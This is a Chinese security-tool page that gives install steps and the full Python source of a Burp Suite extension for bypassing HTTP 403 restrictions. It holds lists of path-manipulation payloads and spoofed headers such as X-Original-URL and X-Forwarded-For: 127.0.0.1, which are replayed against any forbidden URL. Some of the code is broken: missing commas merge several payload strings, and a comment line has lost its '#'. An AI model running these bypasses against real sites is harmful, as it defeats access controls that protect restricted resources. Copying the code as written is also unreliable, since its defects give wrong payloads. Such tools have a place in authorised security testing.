1. 极安网首页
  2. 网络安全工具

BurpSuite之403绕过插件(403Bypass)

403Bypasser是一个burpsuite扩展插件,用于绕过403受限制的目录。通过使用PassiveScan(默认启用),此扩展名将自动扫描每个403请求,因此只需添加到burpsuite中即可。

BurpSuite之403绕过插件(403Bypass)-极安网

Payloads

温馨提示:终身会员登陆后查看

插件安装

BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish

403bypasser.py

  1. from burp import IBurpExtender
  2. from burp import IScannerCheck
  3. from burp import IScanIssue
  4. from java.io import PrintWriter
  5. from array import array
  6. import re
  7. class BurpExtender(IBurpExtender, IScannerCheck):
  8.     #
  9.     # implement IBurpExtender
  10.     #
  11.     def registerExtenderCallbacks(self, callbacks):
  12.         # keep a reference to our callbacks object
  13.         self._callbacks = callbacks
  14.         # obtain an extension helpers object
  15.         self._helpers = callbacks.getHelpers()
  16.         # set our extension name
  17.         callbacks.setExtensionName("403 Directory Bypasser")
  18.         self.stdout = PrintWriter(callbacks.getStdout(), True)
  19.         self.stderr = PrintWriter(callbacks.getStderr(), True)
  20.         # register ourselves as a custom scanner check
  21.         callbacks.registerScannerCheck(self)
  22.     # helper method to search a response for occurrences of a literal match string
  23.     # and return a list of start/end offsets
  24.     def _get_matches(self, sttcode):
  25.         #response = self._helpers.bytesToString(response)
  26.         if sttcode == 403:
  27.             return True
  28.         return False
  29.     def rplHeader(self, headerStr, headerName, newHeader):
  30.         headerStr = re.sub('^'+headerName+':.*?$', newHeader, headerStr, flags=re.I|re.M)
  31.         return headerStr
  32.     def doPassiveScan(self, baseRequestResponse):
  33.         # look for matches of our passive check grep string
  34.         matches = self._get_matches(self._helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode())
  35.         if matches == False:
  36.             return None
  37.         OldReq = self._helpers.bytesToString(baseRequestResponse.getRequest())
  38.         Rurl = self._helpers.analyzeRequest(baseRequestResponse).getUrl().getPath()
  39.         if Rurl != "/":
  40.             Rurl = self._helpers.analyzeRequest(baseRequestResponse).getUrl().getPath().rstrip("/")
  41.         PreviousPath = '/'.join(str(Rurl).split('/')[:-1])
  42.         LastPath = str(Rurl).split('/')[-1]
  43.         self.stdout.println("Scanning: "+Rurl)
  44.         self.stdout.println(self._helpers.analyzeRequest(baseRequestResponse).getHeaders())
  45.         payloads = ["%2e/"+LastPath, LastPath+"/.""./"+LastPath+"/./", LastPath+"%20/""%20"+LastPath+"%20/", LastPath+"..;/",LastPath+"?",LastPath+"??","/"+LastPath+"//",LastPath+"/",LastPath+"/.randomstring"]
  46.         hpayloads = ["X-Rewrite-URL: /"+LastPath, "X-Custom-IP-Authorization: 127.0.0.1""X-Original-URL: /"+LastPath,"Referer: /"+LastPath,"X-Originating-IP: 127.0.0.1","X-Forwarded-For: 127.0.0.1","X-Remote-IP: 127.0.0.1","X-Client-IP: 127.0.0.1","X-Host: 127.0.0.1","X-Forwared-Host: 127.0.0.1"]
  47.         results = []
  48.         for p in payloads:
  49.             NewReq = OldReq.replace(Rurl, PreviousPath+"/"+p)
  50.             checkRequestResponse = self._callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), self._helpers.stringToBytes(NewReq))
  51.             # self.stdout.println(self._helpers.analyzeRequest(checkRequestResponse).getUrl().getPath())
  52.             STT_CODE = self._helpers.analyzeResponse(checkRequestResponse.getResponse()).getStatusCode()
  53.             if STT_CODE == 200:
  54.                 results.append("Url payload: "+self._helpers.analyzeRequest(checkRequestResponse).getUrl().getPath() + " | Status code: "+str(STT_CODE))
  55.         for hp in hpayloads:
  56.             if hp.startswith("Referer:") and "Referer:" in OldReq:
  57.                 NewReq = self.rplHeader(OldReq, "Referer", hp) #.replace("User-Agent: ", hp+"\r\n"+"User-Agent: ")
  58.             else:
  59.                 NewReq = OldReq.replace("User-Agent: ", hp+"\r\n"+"User-Agent: ")
  60.             # self.stdout.println(NewReq)
  61.             checkRequestResponse = self._callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), self._helpers.stringToBytes(NewReq))
  62.             STT_CODE = self._helpers.analyzeResponse(checkRequestResponse.getResponse()).getStatusCode()
  63.             if STT_CODE == 200:
  64.                 results.append("Header payload: "+hp + " | Status code: "+str(STT_CODE))
  65.         if len(results) == 0:
  66.             return None
  67.         return [CustomScanIssue(
  68.             baseRequestResponse.getHttpService(),
  69.             self._helpers.analyzeRequest(baseRequestResponse).getUrl(),
  70.             [self._callbacks.applyMarkers(baseRequestResponse, None, None)],
  71.             "403 Bypass Vuln",
  72.             '<br>'.join(results),
  73.             "High")]
  74.     def consolidateDuplicateIssues(self, existingIssue, newIssue):
  75.         # This method is called when multiple issues are reported for the same URL
  76.         # path by the same extension-provided check. The value we return from this
  77.         # method determines how/whether Burp consolidates the multiple issues
  78.         # to prevent duplication
  79.         #
  80.         # Since the issue name is sufficient to identify our issues as different,
  81.         # if both issues have the same name, only report the existing issue
  82.         # otherwise report both issues
  83.         if existingIssue.getUrl() == newIssue.getUrl():
  84.             return -1
  85.         return 0
  86. #
  87. class implementing IScanIssue to hold our custom scan issue details
  88. #
  89. class CustomScanIssue (IScanIssue):
  90.     def __init__(self, httpService, url, httpMessages, name, detail, severity):
  91.         self._httpService = httpService
  92.         self._url = url
  93.         self._httpMessages = httpMessages
  94.         self._name = name
  95.         self._detail = detail
  96.         self._severity = severity
  97.     def getUrl(self):
  98.         return self._url
  99.     def getIssueName(self):
  100.         return self._name
  101.     def getIssueType(self):
  102.         return 0
  103.     def getSeverity(self):
  104.         return self._severity
  105.     def getConfidence(self):
  106.         return "Certain"
  107.     def getIssueBackground(self):
  108.         pass
  109.     def getRemediationBackground(self):
  110.         pass
  111.     def getIssueDetail(self):
  112.         return self._detail
  113.     def getRemediationDetail(self):
  114.         pass
  115.     def getHttpMessages(self):
  116.         return self._httpMessages
  117.     def getHttpService(self):
  118.         return self._httpService

原创文章,作者: Admin ,转载请注明出处:https://secvery.com/4160.html